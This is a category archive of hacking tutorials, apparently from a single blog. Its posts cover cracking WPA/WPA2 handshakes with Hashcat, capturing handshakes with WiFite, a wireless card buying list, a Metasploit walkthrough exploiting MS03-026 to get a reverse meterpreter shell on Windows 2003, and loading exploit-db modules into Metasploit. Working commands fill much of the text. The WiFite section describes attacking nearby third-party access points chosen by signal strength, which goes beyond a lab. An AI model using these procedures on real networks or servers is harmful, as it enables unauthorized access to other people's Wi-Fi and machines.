Category Archives: HACKING



Cracking WPA WPA2 with Hashcat oclHashcat or cudaHashcat on Kali Linux (BruteForce MASK based attack on Wifi passwords)

cudaHashcat or oclHashcat or Hashcat on Kali Linux got built-in capabilities to attack and decrypt or crack WPA WPA2 handshake.cap files. Only constraint is, you need to convert a .cap file to a.hccap file format. This is rather easy.

Important Note: Many users try to capture with network cards that are not supported. You should purchase a card that supports Kali Linux including injection and monitor mode etc. A list can be found in802.11 Recommended USB Wireless Cards for Kali Linux. It is very important that you have a supported card, otherwise you’ll be just wasting time and effort on something that just won’t do the job.

My Setup

I have a NVIDIA GTX 210 Graphics card in my machine running Kali Linux 1.0.6 and will use rockyou dictionary for most of the exercise. In this post, I will show How to crack WPA/WPA2 handshake file (.cap files) with cudaHashcat or oclHashcat or Hashcat on Kali Linux.

I will use cudahashcat command because I am using a NVIDIA GPU. If you’re using AMD GPU, then I guess you’ll be using oclHashcat. Let me know if this assumptions is incorrect.

Why use Hashcat to crack WPA/WPA2 handshake file?

Pyrit is the fastest when it comes to cracking WPA/WPA2 handshake files. So why are we using Hashcat to crack WPA/WPA2 handshake files?

  1. Because we can?
  2. Because Hashcat allows us to use customized attacks with predefined rules and Masks.

Now this doesn’t explain much and reading HASHCAT Wiki will take forever to explain on how to do it. I’ll just give some examples to clear it up.

Hashcat allows you to use the following built-in charsets to attack a WPA/WPA2 handshake file.

Built-in charsets

?l = abcdefghijklmnopqrstuvwxyz
?d = 0123456789
?s = !”#$%&'()*+,-./:;⇔?@[]^_`{|}~

?a = ?l?u?d?s

Numbered passwords

So lets say you password is 12345678. You can use a custom MASK like ?d?d?d?d?d?d?d?d

What it means is that you’re trying to break a 8 digit number password like 12345678 or 23456789 or 01567891.. You get the idea.

Letter passwords – All uppercase

If your password is all letters in CAPS such as: ABCFEFGH orLKHJHIOP or ZBTGYHQS ..etc. then you can use the following MASK:


It will crack all 8 Letter passwords in CAPS.

Letter passwords – All lowercase

If your password is all letters in lowercase such as: abcdefgh ordfghpoiu or bnmiopty..etc. then you can use the following MASK:


It will crack all 8 Letter passwords in lowercase. I hope you now know where I am getting at.

Passwords – Lowercase letters and numbers

If you know your password is similar to this: a1b2c3d4 or p9o8i7u6or n4j2k5l6 …etc. then you can use the following MASK:


Passwords – Uppercase letters and numbers

If you know your password is similar to this: A1B2C3D4 or P9O8I7U6or N4J2K5L6 …etc. then you can use the following MASK:


Passwords – Mixed matched with uppercase, lowercase, number and special characters.

If you password is all random, then you can just use a MASK like the following:


Note: ?a represents anything …. I hope you’re getting the idea.

If you are absolutely not sure, you can just use any of the predefined MASKs file and leave it running. But yeah, come back to check in a million years for a really long password …. Using a dictionary attack might have more success in that scenario.

Passwords – when you know a few characters

If you somehow know the few characters in the password, this will make things a lot faster. For every known letter, you save immense amount of computing time. MASK’s allows you to combine this. Let’s say your 8 character password starts with abc, doesn’t contain any special characters. Then you can create a MASK rule file to contain the following:


There will be 125 combinations in this case. But it will surely break it in time. This is the true power of using cudaHashcat or oclHashcat or Hashcat on Kali Linux to break WPA/WPA2 passwords.

You can even up your system if you know how a person combines a password. Some people always uses UPPERCASE as the first character in their passwords, few lowercase letters and finishes with numbers.


Your mask will be:


This will make cracking significantly faster. Social engineering is the key here.

That’s enough with MASK’s. Now let’s capture some WPA/WPA2 handshake files.

Capture handshake with WiFite

Why WiFite instead of other guides that uses Aircrack-ng? Because we don’t have to type in commands..

Type in the following command in your Kali Linux terminal:

wifite –wpa

You could also type in

wifite wpa2

If you want to see everything, (wepwpa or wpa2, just type the following command. It doesn’t make any differences except few more minutes


Once you type in following is what you’ll see.

1 - Wifite - Cracking Wifi WPAWPA2 passwords using pyrit and cowpatty - blackMORE Ops

So, we can see bunch of Access Points (AP in short). Always try to go for the ones with CLIENTS because it’s just much faster. You can choose all or pick by numbers. See screenshot below

2 - Wifite Screen - Cracking Wifi WPAWPA2 passwords using pyrit and cowpatty - blackMORE Ops

Awesome, we’ve got few with clients attached. I will pick 1 and 2 cause they have the best signal strength. Try picking the ones with good signal strength. If you pick one with poor signal, you might be waiting a LONG time before you capture anything .. if anything at all.

So I’ve picked 1 and 2. Press Enter to let WiFite do it’s magic.

3 - WiFite Choice - Cracking Wifi WPAWPA2 passwords using pyrit and cowpatty - blackMORE Ops

Once you press ENTER, following is what you will see. I got impatient as the number 1 choice wasn’t doing anything for a LONG time. So I pressed CTRL+C to quit out of it.

This is actually a great feature of WIfite. It now asks me,

What do you want to do?

  1. [c]ontinue attacking targets
  2. [e]xit completely.

I can type in c to continue or e to exit. This is the feature I was talking about. I typed c to continue. What it does, it skips choice 1 and starts attacking choice 2. This is a great feature cause not all routers or AP’s or targets will respond to an attack the similar way. You could of course wait and eventually get a respond, but if you’re just after ANY AP’s, it just saves time.

4 - WiFite continue - Cracking Wifi WPAWPA2 passwords using pyrit and cowpatty - blackMORE Ops

And voila, took it only few seconds to capture a handshake. This AP had lots of clients and I managed to capture a handshake.

This handshake was saved in /root/hs/BigPond_58-98-35-E9-2B-8D.cap file.

Once the capture is complete and there’s no more AP’s to attack, Wifite will just quit and you get your prompt back.

5 - WiFite captured handshake - Cracking Wifi WPAWPA2 passwords using pyrit and cowpatty - blackMORE Ops

Now that we have a capture file with handshake on it, we can do a few things.

Cleanup your cap file using wpaclean

Next step will be converting the .cap file to a format cudaHashcat or oclHashcat or Hashcat on Kali Linux will understand.

Here’s how to do it:

To convert your .cap files manually in Kali Linux, use the following command

wpaclean <out.cap> <in.cap>

Please note that the wpaclean options are the wrong way round. <out.cap> <in.cap> instead of <in.cap> <out.cap> which may cause some confusion.

In my case, the command is as follows:

wpaclean hs/out.cap hs/BigPond_58-98-35-E9-2B-8D.cap

Convert .cap file to .hccap format

We need to convert this file to a format cudaHashcat or oclHashcat or Hashcat on Kali Linux can understand.

To convert it to .hccap format with “aircrack-ng” we need to use the -J option

aircrack-ng <out.cap> -J <out.hccap>

Note the -J is a capitol J not lower case j.

In my case, the command is as follows:

aircrack-ng hs/out.cap -J hs/out

Cracking WPAWPA2 with oclHashcat, cudaHashcat or Hashcat on Kali Linux (BruteForce MASK based attack) - blackMORE Ops - 1

Cracking WPA/WPA2 handshake with Hashcat

cudaHashcat or oclHashcat or Hashcat on Kali Linux is very flexible, so I’ll cover two most common and basic scenarios:

  1. Dictionary attack
  2. Mask attack

Dictionary attack

Grab some Wordlists, like Rockyou.

Read this guide Cracking Wifi WPA/WPA2 passwords using pyrit cowpatty in Kali Linux for detailed instructions on how to get this dictionary file and sorting/cleaning etc.

First we need to find out which mode to use for WPA/WPA2 handshake file. I’ve covered this in great length in Cracking MD5, phpBB, MySQL and SHA1 passwords with Hashcat on Kali Linuxguide. Here’s a short rundown:

cudahashcat --help | grep WPA

So it’s 2500.

Now use the following command to start the cracking process:

cudahashcat -m 2500 /root/hs/out.hccap /root/rockyou.txt

Cracking WPAWPA2 with oclHashcat, cudaHashcat or Hashcat on Kali Linux (BruteForce MASK based attack) - blackMORE Ops - 2

Bingo, I used a common password for this Wireless AP. Took me few seconds to crack it. Depending on your dictionary size, it might take a while.

You should remember, if you’re going to use Dictionary attack, Pyrit would be much much much faster than cudaHashcat or oclHashcat or Hashcat. Why we are showing this here? Cause we can. 🙂

Another guide explains how this whole Dictionary attack works. I am not going to explain the same thing twice here. Read Cracking MD5, phpBB, MySQL and SHA1 passwords with Hashcat on Kali Linux for dictionary related attacks in full length.

Brute-Force Attack

Now this is the main part of this guide. Using Brute Force MASK attack.

To crack WPA WPA2 handshake file using cudaHashcat or oclHashcat or Hashcat, use the following command:


cudahashcat -m 2500 -a 3 capture.hccap ?d?d?d?d?d?d?d?d

Where -m = 2500 means we are attacking a WPA/WPA2 handshake file.

-a = 3 means we are using Brute Force Attack mode (this is compatible with MASK attack).

capture.hccap = This is your converted .cap file. We generated it using wpaclean and aircrack-ng.

?d?d?d?d?d?d?d?d = This is your MASK where d = digit. That means this password is all in numbers. i.e. 7896435 or 12345678etc.

I’ve created a special MASK file to make things faster. You should create your own MASK file in similar way I explained earlier. I’ve saved my file in the following directory as blackmoreops-1.hcmask.


Do the following to see all available default MASK files provided by cudaHashcat or oclHashcat or Hashcat:

ls /usr/share/oclhashcat/masks/

In my case, the command is as follows:

cudahashcat -m 2500 -a 3 /root/hs/out.hccap  /usr/share/oclhashcat/masks/blackmoreops-1.hcmask

Cracking WPA WPA2 with oclHashcat, cudaHashcat or Hashcat on Kali Linux (BruteForce MASK based attack) - blackMORE Ops - 3

Sample .hcmask file

You can check the content of a sample .hcmask file using the following command:

tail -10 /usr/share/oclhashcat/masks/8char-1l-1u-1d-1s-compliant.hcmask

Cracking WPAWPA2 with oclHashcat, cudaHashcat or Hashcat on Kali Linux (BruteForce MASK based attack) - blackMORE Ops - 4

Edit this file to match your requirement, run Hashcat or cudaHashcat and let it rip.

Location of Cracked passwords

Hashcat or cudaHashcat saves all recovered passwords in a file. It will be in the same directory you’ve ran Hashcat or cudaHashcat or oclHashcat. In my case, I’ve ran all command from my home directory which is /root directory.

cat hashcat.pot

Cracking WPA WPA2 with oclHashcat, cudaHashcat or Hashcat on Kali Linux (BruteForce MASK based attack) - blackMORE Ops - 5

802.11 Recommended USB Wireless Cards for Kali Linux

802.11 Recommended USB Wireless Cards for Kali Linux

This post lists some of the best performing, supported and recommended USB Wireless Cards for Kali Linux.

There isn’t a “best” card. There is whatever is right for YOU.

Following recommended USB Wireless cards appears to be working for Kali Linux (i.e. monitor, injection etc.)

*Note* These are not in any type of order *Note*

A common problem in pentest distro such as Kali or BackTrack Linux is when users trying to use a card which is not supported or there just isn’t a supported driver. Most of the following cards are priced below $50USD and they take care of a massive headache and saves time to troubleshoot driver issues rather than investing time to actually do something. With each update these makeshift fixes seems to break old drivers and you end up doing the whole thing again and again. Following guide generated a lot of emails and personal request where users were not able to make it work properly just because their Wifi card wasn’t listed in the recommended wireless cards for Kali Linux.



Rokland N3…b-for-macs-pcs

$32.97 off Rockland



$32.99 off Amazon


TP-Link WN722N…TL-WN722N#spec

$15.18 off Amazon


Linksys WUSB54GC v1

25.00$ off Amazon


5GHz (& 2.4GHz)


Rosewill RNX-N600UBE…ifications.htm

$32.66 off Amazon


Other useful links

As the price will change over time and from country to country, it’s missing on purpose. Places that have been known to stock the mentioned cards:

If you have a different card feel free to share here which will probably help another user someday.

Side Note:

I’ve compiled a small list (These are the only 8 laptops that I could find to match my personal choices) that are Linux compatible and have NVIDIA GeForce Graphics cards. (I’ve tried to avoid AMD/ATI as there’s been some inconsistency lately with their Linux proprietary drivers and heating issues, sorry AMD, take Linux users more seriously next time). NVIDIA seems more stable and gives you more options … Feel free to check this list and add comments about which one you have or prefer…


“No responsibility is taken for the correctness of this information.” == Double check before purchasing.



or maybe you would like to turn a Kindle Device in your Portable Kali installation ? The possibilities are endless …


How to pentest Remote PC (Windows 2003 server) with Metasploits - blackMORE Ops

This is a a detailed step by step guide on How to pentest Remote PC (Windows 2003 server) with Metasploits. I’ve used BackTrack 5 and Windows 2003 server in a virtual environment. The ease of pentesting is scary and readers, sysadmins are advised to update their Windows 2003 server to the latest patch/service pack and use additional antivirus, firewalls to protect them from similar situation. The author takes no responsibility on how this tutorial is being used by readers and this is for educational purpose only.


Metasploit is simple to use and is designed with ease-of-use in mind to aid Penetration Testers.
I will be taking you through this demo in BackTrack 5 R3, so go ahead and download that if you don’t already have it:

The reason for using BackTrack 5 R3 is because it has the correct Ruby Libraries.

Metasploit framework has three work environments,

  1. The msfconsole,
  2. The msfcli interface and
  3. The msfweb interface.

However, the primary and the most preferred work area is the‘msfconsole’. It is an efficient command-line interface that has its own command set and environment system.
Metasploit quick guide

Before executing your exploit, it is useful to understand what some Metasploit commands do. Below are some of the commands that you will use most. Graphical explanation of their outputs would be given as and when we use them while exploiting some boxes in later part of the article.

  1. search : Typing in the command search along with the keyword lists out the various possible exploits that have that keyword pattern.
  2. show exploits : Typing in the command show exploits‘ lists out the currently available exploits. There are remote exploits for various platforms and applications including Windows, Linux, IIS, Apache, and so on, which help to test the flexibility and understand the working of Metasploit.
  3. show payloads : With the same ‘show‘ command, we can also list the payloads available. We can use a ‘show payloads’ to list the payloads.
  4. show options : Typing in the command ‘show options‘ will show you options that you have set and possibly ones that you might have forgotten to set. Each exploit and payload comes with its own options that you can set.
  5. info : If you want specific information on an exploit or payload, you are able to use the ‘info’ command. Let’s say we want to get complete info of the payload ‘winbind’. We can use ‘info payload winbind‘.
  6. use : This command tells Metasploit to use the exploit with the specified name
  7. set RHOST : This command will instruct Metasploit to target the specified remote host.
  8. set RPORT : This command sets the port that Metasploit will connect to on the remote host.
  9. set PAYLOAD : This command sets the payload that is used to a generic payload that will give you a shell when a service is exploited.
  10. set LPORT : This command sets the port number that the payload will open on the server when an exploit is exploited. It is important that this port number be a port that can be opened on the server ( is not in use by another service and not reserved for administrative use), so set it to a random 4 digit number greater than 1024, and you should be fine. You’ll have to change the number each time you successfully exploit a service as well.
  11. exploit : Actually exploits the service. Another version of exploit,rexploit reloads your exploit code and then executes the exploit. This allows you to try minor changes to your exploit code without restarting the console
  12. help : The ‘help’ command will give you basic information of all the commands that are not listed out here.

Now that you are ready with all the basic commands you need to launch your exploit. Let’s choose a couple of scenarios to get control of a remotely connected machine.

Lab Setup:

Victim Machine
OS: Microsoft Windows Server 2003

Attacker (Our) Machine
OS: BackTrack 5 R3
Kernel version: Linux bt 2.6.38 #1 SMP Thu Mar 17 20:52:18 EDT 2011 i686 GNU/Linux
Metasploit Version: Built in version of metasploit 3.8.0-dev


The only information provided to us about the remote server is that it is a Windows 2003 Server and the Objective is to gain shell access of this remote server.

Detailed Steps

Step 1 – Scan with nmap for open ports

Perform an nmap scan of the remote server
The output of the nmap scan shows us a range of ports open which can be seen below in Figure 1.

Step 1 – Scan with nmap for open ports - blackMORE Ops

Figure 1

We notice that there is port 135 open. Thus we can look for scripts in Metasploit to exploit and gain shell access if this server is vulnerable.

Step 2 – Open msfconsole

In your copy of BackTrack, go to:
Application > BackTrack > Exploitation Tools > Network Exploitation Tools > Metasploit Framework > msfconsole

Step 2 – Open msfconsole - blackMORE Ops

Figure 2

During the initialization of msfconsole, standard checks are performed. If everything works out fine we will see the display as shown in Figure 3.

Step 2 – Open msfconsole-2 - blackMORE Ops

Figure 3

Step 3 – Search RPC exploit in Metasploit

Now, we know that port 135 is open so, we search for a related RPC exploit in Metasploit.
To list out all the exploits supported by Metasploit we use the “show exploits” command. This exploit lists out all the currently available exploits and a small portion of it is shown below in Figure 4.

Step 3 – Search RPC exploit in Metasploit - blackMORE Ops

Figure 4

As you may have noticed, the default installation of the Metasploit Framework 3.8.0-dev comes with 696 exploits and 224 payloads, which is quite an impressive stockpile thus finding a specific exploit from this huge list would be a real tedious task. So, we use a better option. You can either visit the link another alternative would be to use the “search” command in Metasploit to search for related exploits for RPC.
In msfconsole type “search dcerpc” to search all the exploits related todcerpc keyword as that exploit can be used to gain access to the server with a vulnerable port 135. A list of all the related exploits would be presented on the msfconsole window and this is shown below in Figure 5.

Step 3 – Search RPC exploit in Metasploit-2 - blackMORE Ops

Figure 5

Step 4 – Gather info about target exploit

Now that you have the list of rpc exploits in front of you, we would need more information about the exploit before we actually use it. To get more information regarding the exploit you can use the command “info exploit/windows/dcerpc/ms03_026_dcom” which provides information such as available targets, exploit requirements, details of vulnerability itself, and even references where you can find more information. This is shown in Figure 6.

Step 4 – Gather info about target exploit - blackMORE Ops

Figure 6

Step 5 – Activate exploit

The command “use” activates the exploit environment for the exploit. In our case we would use the command “use exploit/windows/dcerpc/ms03_026_dcom” to activate our exploit.

Step 5 – Activate exploit - blackMORE Ops

Figure 7

From the above figure it is noticed that, after the use of the exploit “exploit/windows/dcerpc/ms03_026_dcom” the prompt changes from “msf>” to “msf exploit(ms03_026_dcom) >” which symbolizes that we have entered a temporary environment of that exploit.

Step 6 – Configure exploit

Now, we need to configure the exploit as per the need of the current scenario. The “show options” command displays the various parameters which are required for the exploit to be launched properly. In our case, the RPORT is already set to 135 and the only option to be set is RHOST which can be set using the “set RHOST” command.
We enter the command “set RHOST” and we see that the RHOST is set to

Step 6 – Configure exploit - blackMORE Ops

Figure 8

Step 7 – Set payload for exploit

The only step remaining now before we launch the exploit is setting the payload for the exploit. We can view all the available payloads using the “show payloads” command.
As shown in the below figure, “show payloads” command will list all payloads that are compatible with the selected exploit.

Step 7 – Set payload for exploit - blackMORE Ops

Figure 9

For our case, we are using the reverse tcp meterpreter which can be set using the command, “set PAYLOAD windows/meterpreter/reverse_tcp” which spawns a shell if the remote server is successfully exploited. Now again you must view the available options using “show options” to make sure all the compulsory sections are properly filled so that the exploit is launched properly

Step 7 – Set payload for exploit-2 - blackMORE Ops

Figure 10

We notice that the LHOST for out payload is not set, so we set it toout local IP ie. using the command “set LHOST

Step 8 – Launch exploit and establish connection

Now that everything is ready and the exploit has been configured properly it’s time to launch the exploit.

You can use the “check” command to check whether the victim machine is vulnerable to the exploit or not. This option is not present for all the exploits but can be a real good support system before you actually exploit the remote server to make sure the remote server is not patched against the exploit you are trying against it.

In out case as shown in the Figure below, our selected exploit does not support the check option.

Step 8 – Launch exploit and establish connection - blackMORE Ops

Figure 11

The “exploit” command actually launches the attack, doing whatever it needs to do to have the payload executed on the remote system.

Step 8 – Launch exploit and establish connection-2 - blackMORE Ops

Figure 12

The above figure shows that the exploit was successfully executed against the remote machine due to the vulnerable port 135.

This is indicated by change in prompt to “meterpreter >“.

Step 9 – Perform an action on pentested server

Now that a reverse connection has been setup between the victim and our machine, we have complete control of the server.

We can use the help command to see which all commands can be used by us on the remote server to perform the related actions as displayed in the below Figure.

Below are the results of some of the meterpreter commands.

Step 9 – Perform an action on pentested server - blackMORE Ops

Figure 13

Step 9 – Perform an action on pentested server-2 - blackMORE Ops

Add new exploits to Metasploit from Exploit-db

All this timeAll this time you were just using mainstream exploits which were famous but old. They worked well, but only with old unpatched operating systems, not the updated ones. Now it’s time to move on to the next step. Our poor experience against Windows 8 and Java 7u60 left us shattered, and we realized that fully patched and updated machines with strong antivirus and firewall can be pretty  hard to break into. Now we will move into the world of real pentesting, and the first step would be introduction to exploit-db.


As usual, a few official words from the developers before I express my personal views.

The Exploit Database is the ultimate archive of public exploits and corresponding vulnerable software, developed for use by penetration testers and vulnerability researchers. Its aim is to serve as the most comprehensive collection of exploits gathered through direct submissions, mailing lists, and other public sources, and present them in a freely-available and easy-to-navigate database. The Exploit Database is a repository for exploits and proof-of-concepts rather than advisories, making it a valuable resource for those who need actionable data right away. (offensive security)

Some more

The Exploit Database is a CVE-Compatible Database and (where applicable) CVE numbers are assigned to the individual exploit entries in the database. The public database archive does not contain the mapped CVE numbers, but we make them available to our partnering organizations, making links to The Exploit Database entries available within their products.
As many exploit developers lament, it is frequently more difficult to locate a vulnerable application than it is to take a public proof of concept and change it into a working exploit. For this reason, The Exploit Database also hosts the vulnerable application versions whenever possible.
In addition, the team of volunteers that maintain the site also make every effort to verify the submitted exploits and a visual indicator is provided whether or not a successful verification was performed. (Offensive Security)

Now, what exploit db really is, is nothing more than a database where the pentestors who write an exploit for a vulnerability upload the source code of the exploit of other pentestors too see. It is maintained by Offensive Security (the force behind Backtrack, Kali, Metasploit Unleashed). The site itself is pretty easy to navigate, and you can find all sorts of exploits there. Just finding an exploit, however, is not enough, as you need to add it to Metasploit in order to use it. 

Adobe Flash Player Shader Buffer Overflow

This module exploits a buffer overflow vulnerability in Adobe Flash Player. The vulnerability occurs in the flash.Display.Shader class, when setting specially crafted data as its bytecode, as exploited in the wild in April 2014. This module has been tested successfully on IE 6 to IE 11 with Flash 11, Flash 12 and Flash 13 over Windows XP SP3, Windows 7 SP1 and Windows 8. (rapid7)

Now the site suggest that the exploit can be found here.


But using the command

use exploit/windows/browser/adobe_flash_pixel_bender_bof

shows that the exploit is not in Metasploit yet (chances are good it’s there if you update metasploit regularly or if you are reading this tutorial a long time after it was written. Either ways, the method will not differ even if the exploit is already there, so don’t worry. Also you can use a different exploit as per your liking, and just replace the name wherever you see it being used in commands)

Now, there are two alternates. First, update the metasploit framework using 



This will update the framework with new modules.

The second alternate the to download the exploit from exploit-db, then put it in the ~/.msf4/modules/exploit/<your_folder> directory. Any exploit put here will be detected my Metasploit when it starts. It will show up when you type use /exploit/your_folder/exploit_name. An important point here is while the <your_folder is arbitrary  and can be set to any value, it is recommended to use a proper directory structure. For example, this exploit should be placed in~/.msf4/modules/exploit/windows/browser/ directory .Also, it is mandatory to place exploits in a subdirectory of ~/.msf4/modules/exploit/ or you won’t be able to use it. For newbies in Linux, here is a detailed step by step guide.

Get the exploit

For examples sake, we’ll use the adobe shader exploit from Click on the Save icon to download the exploit. Save it on you Kali Desktop.

.msf4 directory method

Now if you are not well versed with linux, you will need help with creating the directory and placing files there. Although I’m guiding you how to do it, you should be proficient in linux usage and should be able to do the basic stuff like this atleast. So, you can either use the command to line create the directories or do it using the GUI.

Command line method

First, say hi to mkdir

mkdir –help
Usage: mkdir [OPTION]… DIRECTORY…
Create the DIRECTORY(ies), if they do not already exist.

Mandatory arguments to long options are mandatory for short options too.
  -m, –mode=MODE   set file mode (as in chmod), not a=rwx – umask
  -p, –parents     no error if existing, make parent directories as needed
  -v, –verbose     print a message for each created directory
  -Z, –context=CTX  set the SELinux security context of each created
                      directory to CTX
      –help     display this help and exit
      –version  output version information and exit

First we’ll move to the already existent directory using (you need to be in root directory for this to work. Type just cd if unsure, it will automatically take you to root directory)root@kali:~# cd .msf4/modules/    
To see what the directory has, execute ls. It will return nothing as the directory is empty.

root@kali:~/.msf4/modules# ls
Now we’ll use mkdir to create what we need.
root@kali:~/.msf4/modules# mkdir exploits
root@kali:~/.msf4/modules# cd exploits
root@kali:~/.msf4/modules/exploits# mkdir windows        
root@kali:~/.msf4/modules/exploits# cd windows
root@kali:~/.msf4/modules/exploits/windows# mkdir browser
root@kali:~/.msf4/modules/exploits/windows# cp      
If you read the mkdir help thing, you might have noticed the -p option. It makes everything much easier. Everything above can be achieved with something as simple as
root@kali:~# mkdir -p ~/.msf4/modules/exploits/windows/browser
Now meet cp
root@kali:~/.msf4/modules/exploits/windows# cp –help
Usage: cp [OPTION]… [-T] SOURCE DEST
Copy SOURCE to DEST, or multiple SOURCE(s) to DIRECTORY.
Assume you have adobe_flash_pixel_bender_bof.rb file on your desktop. Then use the following commands.
root@kali:~/Desktop# cp adobe_flash_pixel_bender_bof.rb ~/.msf4/modules/exploits/windows
root@kali:~# ls 
Desktop  app.apk
root@kali:~# cd Desktop
root@kali:~/Desktop# cp adobe_flash_pixel_bender_bof.rb ~/.msf4/modules/exploits/windows/browser
Now check for yourself
root@kali:~# cd ~/.msf4/modules/exploits/windows/browser
root@kali:~/.msf4/modules/exploits/windows/browser# ls

GUI Method

Go to computer -> Filesystem->Home. Now you won’t see .msf4 there, because the . prefix is for hidden files. So go to view and select show hidden items. Now it will be visible.

Now the rest is going to be a piece of cake. Copy the exploit from desktop, and create the directories by using the easy peasy right click -> New folder method. After that just paste the file where it needs to be. You’ll be done. Now start msfconsole again or type reload_all to reload the module. This will add the module to metasploit and you can use it as you normally would.

Hack WiFi WPA-2 PSK Capturing the Handshake

WPA password hacking

Okay, so hacking WPA-2 PSK involves 2 main steps-

  1. Getting a handshake (it contains the hash of password, i.e. encrypted password)
  2. Cracking the hash.

Now the first step is conceptually easy. What you need is you, the attacker, a client who’ll connect to the wireless network, and the wireless access point. What happens is when the client and access point communicate in order to authenticate the client, they have a 4 way handshake that we can capture. This handshake has the hash of the password. Now there’s no direct way of getting the password out of the hash, and thus hashing is a robust protection method. But there is one thing we can do. We can take all possible passwords that can exists, and convert them to hash. Then we’ll match the hash we created with the one that’s there in the handshake. Now if the hashes match, we know what plain text password gave rise to the hash, thus we know the password. If the process sounds really time consuming to you, then its because it is. WPA hacking (and hash cracking in general) is pretty resource intensive and time taking process. Now there are various different ways cracking of WPA can be done. But since WPA is a long shot, we shall first look at the process of capturing a handshake. We will also see what problems one can face during the process (I’ll face the problems for you). Also, before that, some optional wikipedia theory on what a 4-way handshake really is (you don’t want to become a script kiddie do you?)

The Four-Way Handshake

The authentication process leaves two considerations: the access point (AP) still needs to authenticate itself to the client station (STA), and keys to encrypt the traffic need to be derived. The earlier EAP exchange or WPA2-PSK has provided the shared secret key PMK (Pairwise Master Key). This key is, however, designed to last the entire session and should be exposed as little as possible. Therefore the four-way handshake is used to establish another key called the PTK (Pairwise Transient Key). The PTK is generated by concatenating the following attributes: PMK, AP nonce (ANonce), STA nonce (SNonce), AP MAC address, and STA MAC address. The product is then put through PBKDF2-SHA1 as the cryptographic hash function.
The handshake also yields the GTK (Group Temporal Key), used to decrypt multicast and broadcast traffic. The actual messages exchanged during the handshake are depicted in the figure and explained below:

  1. The AP sends a nonce-value to the STA (ANonce). The client now has all the attributes to construct the PTK.
  2. The STA sends its own nonce-value (SNonce) to the AP together with a MIC, including authentication, which is really a Message Authentication and Integrity Code: (MAIC).
  3. The AP sends the GTK and a sequence number together with another MIC. This sequence number will be used in the next multicast or broadcast frame, so that the receiving STA can perform basic replay detection.
  4. The STA sends a confirmation to the AP.

All the above messages are sent as EAPOL-Key frames.
As soon as the PTK is obtained it is divided into five separate keys:
PTK (Pairwise Transient Key – 64 bytes)

  1. 16 bytes of EAPOL-Key Confirmation Key (KCK)– Used to compute MIC on WPA EAPOL Key message
  2. 16 bytes of EAPOL-Key Encryption Key (KEK) – AP uses this key to encrypt additional data sent (in the ‘Key Data’ field) to the client (for example, the RSN IE or the GTK)
  3. 16 bytes of Temporal Key (TK) – Used to encrypt/decrypt Unicast data packets
  4. 8 bytes of Michael MIC Authenticator Tx Key – Used to compute MIC on unicast data packets transmitted by the AP
  5. 8 bytes of Michael MIC Authenticator Rx Key – Used to compute MIC on unicast data packets transmitted by the station

The Michael MIC Authenticator Tx/Rx Keys provided in the handshake are only used if the network is using TKIP to encrypt the data.

 By the way, if you didn’t understand much of it then don’t worry. There’s a reason why people don’t  search for hacking tutorials on Wikipedia (half the stuff goes above the head)

Capturing The Handshake

Now there are several (only 2 listed here) ways of capturing the handshake. We’ll look at them one by one-

  1. Wifite (easy and automatic)
  2. Airodump-ng (easy but not automatic, you manually have to do what wifite did on its own)



We’ll go with the easy one first. Now you need to realize that for a handshake to be captured, there needs to be a handshake. Now there are 2 options, you could either sit there and wait till a new client shows up and connects to the WPA network, or you can force the already connected clients to disconnect, and when they connect back, you capture their handshake. Now while other tutorials don’t mention this, I will (such a good guy I am 🙂 ). Your network card is good at receiving packets, but not as good in creating them. Now if your clients are very far from you, your deauth requests (i.e. please get off this connection request) won’t reach them, and you’ll keep wondering why you aren’t getting any handshake (the same kind of problem is faced during ARP injection and other kind of attacks too). So, the idea is to be as close to the access point (router) and the clients as possible. Now the methodology is same for wifite and airodump-ng method, but  wifite does all this crap for you, and in case of airodump-ng, you’ll have to call a brethren (airreply-ng) to your rescue. Okay enough theory.

Get the handshake with wifite

Now my configuration here is quite simple. I have my cellphone creating a wireless network named ‘me’ protected with wpa-2. Now currently no one is connected to the network. Lets try and see what wifite can do.

root@kali:~# wifite
.;’                     `;,
.;’  ,;’             `;,  `;,   WiFite v2 (r85)
.;’  ,;’  ,;’     `;,  `;,  `;,
::   ::   :   ( )   :   ::   ::  automated wireless auditor
‘:.  ‘:.  ‘:. /_ ,:’  ,:’  ,:’
‘:.  ‘:.    /___    ,:’  ,:’   designed for Linux
‘:.       /_____      ,:’

[+] scanning for wireless devices…
[+] enabling monitor mode on wlan0… done
[+] initializing scan (mon0), updates at 5 sec intervals, CTRL+C when ready.
[0:00:04] scanning wireless networks. 0 targets and 0 clients found

[+] scanning (mon0), updates at 5 sec intervals, CTRL+C when ready.
— ——————–  —  —-  —–  —-  ——
1  me                     1  WPA2  57db   wps
2  *******              11  WEP   21db    no   client
3  **************   11  WEP   21db    no

Now as you can see, my network showed up as ‘me’. I pressed ctrl+c and wifite asked me which target to attack (the network has wps enabled. This is an added bonus, reaver can save you from all the trouble. Also, wifite will use reaver too to skip the whole WPA cracking process and use a WPS flaw instead. We have a tutorial on hacking WPA WPS using Reaver already, in this tutorial we’ll forget that this network has WPS and capture the handshake instead)
[+] select target numbers (1-3) separated by commas, or ‘all’: 
Now I selected the first target,  i.e. me. As expected, it had two attacks in store for us. First it tried the PIN guessing attack. It has almost 100% success rate, and would have given us the password had I waited for 2-3 hours. But I pressed ctrl+c and it tried to capture the handshake. I waited for 10-20 secs, and then pressd ctrl+c. No client was there so no handshake could be captured. Here’s what happened.

[+] 1 target selected.
[0:00:00] initializing WPS PIN attack on me (02:73:8D:37:A7:ED)
^C0:00:24] WPS attack, 0/0 success/ttl,
(^C) WPS brute-force attack interrupted
[0:08:20] starting wpa handshake capture on “me”
[0:08:05] listening for handshake…
(^C) WPA handshake capture interrupted
[+] 2 attacks completed:
[+] 0/2 WPA attacks succeeded
[+] disabling monitor mode on mon0… done
[+] quitting

Now I connected my other PC to ‘me’. Lets do it again. This time a client will show up, and wifite will de-authenticate it, and it’ll try to connect again. Lets see what happens this time around.

   NUM ESSID                 CH  ENCR  POWER  WPS?  CLIENT
— ——————–  —  —-  —–  —-  ——
1  *    1  WPA   99db    no   client
2  me  1 WPA2  47db   wps   client
3  *    11  WEP   22db    no   clients
4  *   11  WEP   20db    no

[+] select target numbers (1-4) separated by commas, or ‘all’: 2
[+] 1 target selected.
[0:00:00] initializing WPS PIN attack on me (02:73:8D:37:A7:ED)
^C0:00:07] WPS attack, 0/0 success/ttl,
(^C) WPS brute-force attack interrupted
[0:08:20] starting wpa handshake capture on “me”
[0:07:51] listening for handshake…
(^C) WPA handshake capture interrupted
[+] 2 attacks completed:
[+] 0/2 WPA attacks succeeded
[+] quitting

Now the deauth attacks weren’t working. This time I increased the deauth frequency.
